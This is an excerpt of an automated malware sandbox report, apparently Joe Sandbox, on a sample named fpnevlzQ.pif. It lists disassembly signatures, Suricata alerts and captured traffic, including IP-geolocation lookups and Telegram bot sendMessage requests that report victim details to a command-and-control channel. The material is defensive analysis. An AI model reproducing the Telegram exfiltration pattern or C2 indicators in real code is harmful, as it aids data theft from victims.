Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_321BFD48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_321B2061
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_321B51DF
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_321BFD38
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_321B1D26
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_321B1D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then push 00000000h	7_2_3252D899
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 1F6EF9C0h	10_2_1F6EFA0F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 1F6EF9C0h	10_2_1F6EF820
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23463326h	10_2_23462F08
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23462D5Ch	10_2_23462AA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346FC0Ch	10_2_2346F960
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_23460040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346E1FCh	10_2_2346DF50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23463326h	10_2_23462F02
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23460D10h	10_2_23460B30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234616FBh	10_2_23460B30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346E654h	10_2_2346E3A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346D4F4h	10_2_2346D248
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23463326h	10_2_23463254
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346DDA4h	10_2_2346DAF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346D94Ch	10_2_2346D6A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346F7B4h	10_2_2346F508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346D09Ch	10_2_2346CDF0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346EF04h	10_2_2346EC58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346EAACh	10_2_2346E800
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2346F35Ch	10_2_2346F0B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23482A04h	10_2_23482758
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23488320h	10_2_23487FE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348D191h	10_2_2348CEC0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234896F3h	10_2_23489420
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348D629h	10_2_2348D358
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234825ACh	10_2_23482300
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234855DCh	10_2_23485330
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234879DCh	10_2_23487730
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348BA99h	10_2_2348B7C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23485E8Ch	10_2_23485BE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348DAC1h	10_2_2348D7F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23487E34h	10_2_23487B88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23485A34h	10_2_23485788
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348F651h	10_2_2348F380
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23482E5Ch	10_2_23482BB0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348ED21h	10_2_2348EA50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23481CFCh	10_2_23481A50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348CCF9h	10_2_2348CA28
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23487584h	10_2_234872D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23485184h	10_2_23484ED8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348F1B9h	10_2_2348EEE8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23484D2Ch	10_2_23484A80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348712Ch	10_2_23486E80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23482154h	10_2_23481EA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23480FF4h	10_2_23480D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov esp, ebp	10_2_2348B52A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348E3F1h	10_2_2348E120
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234818A4h	10_2_234815F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348C861h	10_2_2348C590
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348144Ch	10_2_234811A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348E889h	10_2_2348E5B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234802ECh	10_2_23480040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348BF31h	10_2_2348BC60
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348370Ch	10_2_23483460
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234832B4h	10_2_23483008
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348FAE9h	10_2_2348F818
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234862E4h	10_2_23486038
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23486B96h	10_2_234868E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348C3C9h	10_2_2348C0F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23480B9Ch	10_2_234808F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348DF59h	10_2_2348DC88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23480744h	10_2_23480498
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2348673Ch	10_2_23486490
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 23483B64h	10_2_234838B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AA813h	10_2_234AA518
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A6882h	10_2_234A6510
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A6EB3h	10_2_234A6BB8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A5A19h	10_2_234A5748
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A7843h	10_2_234A7548
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AE63Bh	10_2_234AE340
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A2C29h	10_2_234A2958
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234ACE53h	10_2_234ACB58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AB66Bh	10_2_234AB370
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A0C41h	10_2_234A0970
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234ABFFBh	10_2_234ABD00
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A39F1h	10_2_234A3720
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A1A09h	10_2_234A1738
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A902Bh	10_2_234A8D30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AC4C3h	10_2_234AC1C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A1EA1h	10_2_234A1BD0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A5EB1h	10_2_234A5BE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AACDBh	10_2_234AA9E0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A94F3h	10_2_234A91F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A30C1h	10_2_234A2DF0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A9E83h	10_2_234A9B88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A4C51h	10_2_234A4980
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AF493h	10_2_234AF198
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A869Bh	10_2_234A83A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A3E89h	10_2_234A3BB8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234ADCABh	10_2_234AD9B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A0311h	10_2_234A0040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A4321h	10_2_234A4050
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AA34Bh	10_2_234AA050
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A2312h	10_2_234A2068
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A8B63h	10_2_234A8868
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AF95Bh	10_2_234AF660
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AE173h	10_2_234ADE78
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A6349h	10_2_234A6078
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AEB03h	10_2_234AE808
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A10D9h	10_2_234A0E08
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A50EAh	10_2_234A4E18
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A7D0Bh	10_2_234A7A10
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AD31Bh	10_2_234AD020
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234ABB33h	10_2_234AB838
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A2791h	10_2_234A24C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A99BBh	10_2_234A96C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A07A9h	10_2_234A04D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A81D3h	10_2_234A7ED8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AEFCBh	10_2_234AECD0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AD7E3h	10_2_234AD4E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A47B9h	10_2_234A44E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A3559h	10_2_234A3288
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A737Bh	10_2_234A7080
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AC98Bh	10_2_234AC690
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234AB1A3h	10_2_234AAEA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A1571h	10_2_234A12A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 234A5581h	10_2_234A52B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F2983h	10_2_239F2688
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F0CCBh	10_2_239F09D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F24BBh	10_2_239F21C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F0803h	10_2_239F0508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F1663h	10_2_239F1368
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F1194h	10_2_239F0E98
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F1FF3h	10_2_239F1CF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F1B2Bh	10_2_239F1830
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 239F033Bh	10_2_239F0040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B751F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov ecx, 000003E8h	10_2_23B7FD48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B72061
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B751DF
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov ecx, 000003E8h	10_2_23B7FD39
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B71D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B71C91
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_23B71CE9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then push 00000000h	10_2_23ECD699

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49854 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49924 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49798 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:51559 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2014:41:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2013:03:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2015:52:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49748 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49735 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49727 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49771 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49783 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49866 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49843 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49853 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49756 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49884 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49896 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49836 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49850 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49811 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49822 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49765 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49777 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
